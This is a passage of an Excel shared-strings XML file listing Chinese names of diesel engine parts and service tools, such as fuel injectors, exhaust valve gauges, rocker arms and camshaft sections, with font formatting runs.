      <t>拉杆轴销</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>单向阀体冲洗</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀座量规</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀杆量规</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>磨环</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>固定螺丝</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>回旋盖</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>止推轴承</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀桥左部</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀桥右部</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>球导块</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸液压单元</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>返回油标准管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油缸底块</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油缸中间块</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油缸顶块</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压燃油泵</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶盖总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油柱塞</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压柱塞</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷水阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷水阀头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气控制块</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器毛坯</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器壳体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器包装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高压管连接</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑动衬套</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑动轴</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支撑</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油嘴总成</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>楔</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油嘴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油嘴</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盖</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>底块</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支撑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑块焊接工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油嘴</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>半成品</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油嘴</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>切口滤器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀导套要求</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力测试泵</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>流动</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>止回阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>装配工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锥工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>研磨心轴</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支撑</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内部</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器取出工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>预燃室安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上端固定物</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>关闭块</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全帽覆盖物</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>固定样板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动阀装配心轴</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>球</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>方头螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全阀瓣</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全阀盖螺母</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力销</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>摇臂毛坯</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>球推力块</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>摇臂支架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导向装置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力块</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>摇臂</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>用润滑脂</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锁紧环</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>第</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部分的环</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶块</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油缸裙部</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶杆护套</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶杆管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>摇臂</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>毛坯</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>研磨心轴导向装置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀和泵齿轮</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶杆衬套</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀件驱动装置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>溢流阀导壳</t>
    </r>
  </si>
  <si>
    <r>
      <t>SKF</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>联轴节</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴截面</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴前端</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴毛坯</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴中部</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴中部</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>后端</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>模板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气凸轮</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>模板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油凸轮</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>公差</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴调节工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
